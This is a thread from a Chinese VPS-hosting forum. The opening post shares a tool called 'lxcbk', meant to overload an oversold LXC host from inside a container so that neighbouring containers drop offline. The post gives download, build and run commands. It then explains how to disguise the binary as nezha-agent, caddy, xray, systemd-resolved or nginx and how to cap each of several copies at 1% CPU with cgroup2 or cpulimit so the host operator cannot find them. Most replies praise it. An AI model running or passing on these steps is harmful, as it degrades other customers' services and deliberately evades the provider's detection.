立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 55|回复: 8

LXC小鸡通杀炸母鸡脚本,实测真的有用

[复制链接]

LXC小鸡通杀炸母鸡脚本,实测真的有用

[复制链接]

5

主题

4

回帖

67

积分

注册会员

积分
67
LinusTorvalds

5

主题

4

回帖

67

积分

注册会员

积分
67
2024-9-10 00:26:42 | 显示全部楼层 |阅读模式
本帖最后由 LinusTorvalds 于 2024-9-10 00:34 编辑

源码仓库:https://github.com/oplxc/lxcbenchmark

下载:
[ol]
  • wget https://github.com/oplxc/lxcbenchmark/archive/refs/heads/main.zip[/ol]复制代码

    解压:
    [ol]
  • unzip main.zip
  • mv lxcbenchmark-main/* .
  • make
  • chmod +x lxcbk[/ol]复制代码

    实测线程调整为2有较高放大比例,不建议调整的过大。

    [ol]
  • export thd=2[/ol]复制代码


    直接运行
    [ol]
  • ./lxcbk[/ol]复制代码


    在自己pve机器下开出来的lxc测试,放大比例(lxcfs(占用):lxcbk(目标程序占用))确实将近5-10倍。

    在lxc超售太猛的机器上更加有效,放大比例更加很大。都能看到邻居探针更猛烈的掉线和仰卧起坐。



    lxcbk(炸鸡程序)实测可以改名。不要用默认的lxcbk名称,改为nezha-agent或者caddy之类的。然后lxcbk替换掉默认的/opt/nezha/agent/nezha-agent。并且也可使用 /opt/nezha/agent/nezha-agent -s xxxxx.com:443 -p xxxxxxx伪装启动。这样老板在母鸡上ps很难揪出你的程序。

    不过为了防止更能被揪出来。建议不要只依赖启动一个程序,启动多个程序,同时每个程序只占用1%的cpu,这样老板就更难揪出来了。



    实测使用lxcbk替换以下程序,/usr/local/bin/caddy,/usr/local/bin/xray,/lib/systemd/systemd-resolved,/sbin/nginx。
    然后再使用cpu限制模式启动,鸡主很难发现。

    可以用1%占用启动多个程序,这样就不容易被发现。

    建议方法cgroup2限制,不容易发现:

    [ol]
  • mkdir /sys/fs/cgroup/cgroupbk
  • echo "1000 100000" | sudo tee /sys/fs/cgroup/cgroupbk/cpu.max
  • setsid /usr/local/bin/caddy run &
  • new_pid=$!
  • echo $((new_pid + 1)) > /sys/fs/cgroup/cgroupbk/cgroup.procs[/ol]复制代码

    备用方法cpulimit,有发现风险:
    [ol]
  • cpulimit --limit 1 -- /usr/local/bin/caddy run[/ol]复制代码

    /usr/local/bin/caddy是伪装的程序,实测lxcbk可以伪装为任何程序。然后启动多个不同名称的伪装程序实行炸鸡。

    lxcbk对母鸡的放大比例能达到10倍,炸鸡程序占用1%,母鸡会占用10%左右。真的有效
  • 回复

    使用道具 举报

    5

    主题

    4

    回帖

    67

    积分

    注册会员

    积分
    67
    LinusTorvalds 楼主

    5

    主题

    4

    回帖

    67

    积分

    注册会员

    积分
    67
    2024-9-10 00:36:30 | 显示全部楼层

    用户名真难起 发表于 2024-9-10 00:35

    只能说……牛……CCS和CC会颤抖么

    之前看到这个程序的时候测试过了的,只对lxc架构有效。kvm架构完全没用
    回复

    使用道具 举报

    106

    主题

    560

    回帖

    2302

    积分

    金牌会员

    积分
    2302
    Typeboom

    106

    主题

    560

    回帖

    2302

    积分

    金牌会员

    积分
    2302
    2024-9-10 00:35:00 | 显示全部楼层
    损人不利己

    回复

    使用道具 举报

    17

    主题

    69

    回帖

    277

    积分

    中级会员

    积分
    277
    x64

    17

    主题

    69

    回帖

    277

    积分

    中级会员

    积分
    277
    2024-9-10 00:30:51 | 显示全部楼层
    人才啊,大佬威武
    回复

    使用道具 举报

    0

    主题

    1602

    回帖

    4270

    积分

    论坛元老

    积分
    4270
    0.0

    0

    主题

    1602

    回帖

    4270

    积分

    论坛元老

    积分
    4270
    2024-9-10 00:30:26 | 显示全部楼层
    大佬

    回复

    使用道具 举报

    2

    主题

    10

    回帖

    36

    积分

    新手上路

    积分
    36
    用户名真难起

    2

    主题

    10

    回帖

    36

    积分

    新手上路

    积分
    36
    2024-9-10 00:32:53 | 显示全部楼层
    只能说……牛……CCS和CC会颤抖么
    回复

    使用道具 举报

    2

    主题

    10

    回帖

    36

    积分

    新手上路

    积分
    36
    用户名真难起

    2

    主题

    10

    回帖

    36

    积分

    新手上路

    积分
    36
    2024-9-10 00:35:00 | 显示全部楼层

    LinusTorvalds 发表于 2024-9-10 00:36

    之前看到这个程序的时候测试过了的,只对lxc架构有效。kvm架构完全没用

    原来大佬已经测过了,严谨
    回复

    使用道具 举报

    4

    主题

    182

    回帖

    694

    积分

    高级会员

    积分
    694
    wps

    4

    主题

    182

    回帖

    694

    积分

    高级会员

    积分
    694
    2024-9-10 00:40:58 | 显示全部楼层
    可以的,很6,还好我没lxc的机器
    回复

    使用道具 举报

    136

    主题

    2047

    回帖

    7195

    积分

    论坛元老

    积分
    7195
    tomcb

    136

    主题

    2047

    回帖

    7195

    积分

    论坛元老

    积分
    7195
    2024-9-10 00:36:00 | 显示全部楼层
    本来看机器还有80G内存空闲,想开点LXC给MJJ玩的,还是算了。
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|小黑屋|HS2V主机综合交流论坛

    GMT+8, 2024-11-26 05:28 , Processed in 0.028373 second(s), 2 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表